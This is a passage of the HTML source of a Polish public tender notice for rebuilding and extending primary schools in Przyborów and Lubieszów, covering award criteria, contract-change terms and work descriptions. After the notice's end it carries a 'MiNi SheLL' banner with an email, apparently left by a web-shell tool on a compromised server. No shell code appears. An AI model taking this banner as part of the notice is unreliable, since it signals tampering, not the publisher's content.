style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>CENA</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>OKRES GWARANCJI I RĘKOJMI</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu">Nie</span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa">licytacja wieloetapowa</span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"></span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani">Nie</span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Istotne zmiany postanowień umowy w stosunku do treści oferty1. Strony dopuszczają możliwość zmiany postanowień umowy w zakresie dotyczącym zmiany sposobuwykonania przedmiotu umowy w przypadku:a) konieczności zrealizowania jakiejkolwiek części robót, objętej przedmiotem umowy, przyzastosowaniu odmiennych rozwiązań technicznych lub technologicznych, niż wskazanew dokumentacji projektowej, a wynikających ze stwierdzonych wad tej dokumentacji lub zmianystanu prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązańgroziło niewykonaniem lub nienależytym wykonaniem przedmiotu umowy,b) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznychlub materiałowych stosunku do określonych w dokumentacji projektowej lub specyfikacjitechnicznej wykonania i odbioru robót ze względu na zmiany obowiązującego prawa.2. Strony dopuszczają możliwość zmiany postanowień umowy w zakresie dotyczącym zmianywynagrodzenia w przypadku ustawowej zmiany stawki podatku od towarów i usług (VAT), w takimprzypadku wynagrodzenie należne wykonawcy zostanie odpowiednio zmienione w stosunkuwynikającym ze zmienionej stawki podatku od towarów i usług (VAT). Zmiana wysokościwynagrodzenia należnego wykonawcy będzie odnosić się wyłącznie do części przedmiotu umowyzrealizowanej zgodnie z terminami ustalonymi w harmonogramie rzeczowo - finansowym, po dniuwejścia w życie przepisów zmieniających stawkę podatku od towarów i usług oraz wyłącznie do częściprzedmiotu umowy, do której zastosowanie znajdzie zmiana stawki podatku od towarów i usług.Wartość wynagrodzenia netto nie zmieni się, a wartość wynagrodzenia brutto zostanie wyliczonana podstawie nowych przepisów.3. Strony dopuszczają możliwość zmiany postanowień umowy w zakresie dotyczącym zmianywynagrodzenia w przypadku konieczności wykonania robót zamiennych w stosunku do przewidzianychdokumentacją projektową w sytuacji, gdy wykonanie tych robót będzie niezbędne do prawidłowego,tj. zgodnego z zasadami wiedzy technicznej i obowiązującymi na dzień odbioru robót przepisami jeżeliwprowadzane zmiany będą miały wpływ na koszty wykonania zamówienia przez wykonawcę4. Strony dopuszczają możliwość zmiany postanowień umowy w zakresie dotyczącym zmiany terminuwykonania przedmiotu umowy w przypadkua) z powodu siły wyższej, których wystąpienie zostało potwierdzone wpisem do dziennika budowyprzez inspektora nadzoru inwestorskiego i zostało zaakceptowane przez zamawiającegonp. w przypadku zaistnienia działań wojennych, aktów terroryzmu, rewolucji, przewrotuwojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, z wyjątkiem tych które mogąbyć spowodowane użyciem ich przez wykonawcę, zaistnienia klęski żywiołowej, jak huragany,powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy spowodowane przez osobyinne niż pracownicy wykonawcy i jego podwykonawców,29b) odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych, terenowych,archeologicznych, wodnych itp., w szczególności: istnienie podziemnych urządzeń, instalacji lubobiektów infrastrukturalnych; wykopaliska archeologiczne, jeżeli mają te okoliczności wpływna wystąpienie przestojów w realizacji robót budowlanych i termin wykonania umowy,c) wstrzymanie budowy przez właściwy organ z przyczyn nie zawinionych przez wykonawcęnp. odkrycie niewypałów i niewybuchów, zagrożenie wybuchem;d) będącym następstwem opóźnienia w działaniach organów administracji, z przyczyn nie zawinionychprzez wykonawcę w szczególności: przekroczenie zakreślonych przez prawo terminów wydaniaprzez organy administracji map, uzgodnień, opinii, decyzji, zezwoleń, itp.;e) zlecenia wykonania zamiennych lub dodatkowych robót budowlanych, o ile ich wykonanie tychrobót powoduje konieczność przedłużenia terminu wykonania robót objętych niniejszą umową.W przypadku wystąpienia którejkolwiek z okoliczności wymienionych powyżej - termin wykonaniaumowy może być przedłużony o czas trwania tych okoliczności. Nie stanowią podstawydo przesunięcia terminu wykonania umowy złe warunki atmosferyczne utrudniające lubuniemożliwiające prowadzenie robót budowlanych np. niska temperatura, opady deszczu itp.5. Przedłużenie terminu wykonania umowy dopuszczalne jest tylko z wcześniejszym przedłużeniem okresuważności zabezpieczenia należytego wykonania umowy lub wniesieniem nowego zabezpieczenianależytego wykonania umowy na przedłużony termin wykonania zamówienia i uznania go przezzamawiającego za należycie wykonane, z zachowaniem ciągłości zabezpieczenia i bez zmniejszenia jegowysokości.6. Warunkiem dokonania zmian w umowie jest złożenie wniosku przez stronę inicjującą zmianę. Wszelkiezmiany niniejszej umowy wymagają pisemnej formy pod rygorem nieważności.7. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazićzgodę. Nie stanowią one jednak zobowiązania do wyrażenia takiej zgody.8. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy Prawo zamówień publicznych:1) zmiana danych związanych z obsługą administracyjno-organizacyjną umowy (np. zmiananr rachunku bankowego);2) zmiany danych teleadresowych,3) zmiany osób wskazanych do kontaktów między stronami,</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-05-29 </span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">09:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>przebudowa i rozbudowa Publicznej Szkoły Podstawowej w Przyborowie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ (ZADANIE) 1Przebudowa i rozbudowa budynku Publicznej Szkoły Podstawowej w Przyborowie.Przedmiot inwestycji obejmuje w szczególności wykonanie: robót rozbiórkowych i budowlanych,instalacji elektrycznych, instalacji zimnej i ciepłej wody użytkowej, instalacji wodnej przeciwpożarowejhydrantowej oraz kanalizacji w rozbudowywanej części budynku oświaty wewnętrznej instalacjicentralnego ogrzewaniaRozbiórka: -ścian zewnętrznych istniejącej kotłowni, dachu nad kotłownią, (ściany wykonane z pustakaAlfa, nadproża typu L19, dach kotłowni jednospadowy płaski, z płyt dachowych korytkowych, kryty papątermozgrzewalną na izolacji termicznej ze styropianu), -demontaż wyposażenia kotłowni (piece, zbiornikiinstalacje, solarach), -ścianek działowych wewnątrz budynku szkoły (ścianka w wc, w bibliotece,w pokoju nauczycielskim, ścianki w kotłowni, -strefy wejściowej do części sportowej (ściany zewnętrznez pustaka Alfa i stropodach żelbetowy), -betonowych podestów i schodów wejściowych prowadzących naplac sportowy. Projektuje się: -rozbudowę szkoły w części parterowej o: dwie sale lekcyjne (pracowniakomputerowa, pracownia matematyczna), korytarze, strefę wejściową, -zamyka się istniejącą przestrzeńmiędzy skrzydłami pawilonów (dziedziniec) projektując świetlico-stołówkę, przebudowę istniejącejbiblioteki na pracownię przyrodniczą, sanitariatów damsko-męskich, istniejącego pokojunauczycielskiego na wydawalnie posiłków, salki przedszkolnej na pokój nauczycielski, części korytarzana wc dla niepełnosprawnych, kotłowni, -zamurowania, przekucia otworów drzwiowych, -ociepleniei kolorystyka części projektowanej oraz remont elewacji istniejącego budynku, -przebudowa instalacjikanalizacji sanitarnej zewnętrznej na odcinkach między skrzydłami pawilonów szkolnych (dziedziniec).Elementy instalacji elektrycznych: lokalizacja głównej tablicy budynku TG, - lokalizacja tablicyrozdzielczej TR, - główny wyłącznik p.poż. (dla części istniejącej i projektowanej) - wewnętrzna liniazasilająca, - instalacja gniazd wtyczkowych ogólnego przeznaczenia - instalacja gniazd wtyczkowych dlazasilania komputerów, - instalacja oświetlenia ogólnego, - instalacja oświetlania awaryjnegoi ewakuacyjnego (kierunkowego), -instalacja zasilania nasad wentylacyjnych i podgrzewanychnawietrzników, -instalacja odgromowa<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45000000-7, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-30 00:00:00<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">OKRES GWARANCJI I RĘKOJMI</td><td style="border: 1px solid black;border-collapse: collapse;">40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>przebudowa i rozbudowa Publicznej Szkoły Podstawowej w Lubieszowie</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>CZĘŚĆ (ZADANIE) 2Przebudowa i rozbudowa budynku Publicznej Szkoły Podstawowej w Lubieszowie.Przedmiot inwestycji obejmuje w szczególności wykonanie rozbudowy: - szkoły w kierunku wschodnimz wykorzystaniem istniejących ścian budynku, -instalacji elektrycznej, -instalacji wodno - kanalizacyjnej, - instalacji centralnego ogrzewania; przebudowa doziemnej instalacji kanalizacji sanitarnej tłocznej, -rozbiórka części placu zabaw, - utwardzenie terenu dojścia do klatki schodowej; przebudowa zewnętrznejinstalacji kanalizacji sanitarnej, kanalizacji deszczowej, wewnętrznej instalacji kanalizacji sanitarnej,wodociągowej, wewnętrznej instalacji hydrantowej, centralnego ogrzewania oraz przebudowa kotłownina paliwo stałe . W zakresie elementów instalacji elektrycznych : - lokalizacja głównej tablicy budynkuTG,-lokalizacja tablicy rozdzielczej TR (projektowanej) ,- główny wyłącznik p.poż. (dla części istniejąceji projektowanej), - wewnętrzna linia zasilająca, -instalacja gniazd wtyczkowych ogólnego przeznaczenia,- instalacja gniazd wtyczkowych dla zasilania komputerów, - instalacja oświetlenia ogólnego, - instalacja4oświetlania awaryjnego i ewakuacyjnego (kierunkowego), - instalacja zasilania nasad wentylacyjnychi podgrzewanych nawietrzników, - instalacja odgromowa.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>, <br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: 0,0<br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-07-30 00:00:00<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">CENA</td><td style="border: 1px solid black;border-collapse: collapse;">60</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">OKRES GWARANCJI I RĘKOJMI</td><td style="border: 1px solid black;border-collapse: collapse;">40</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com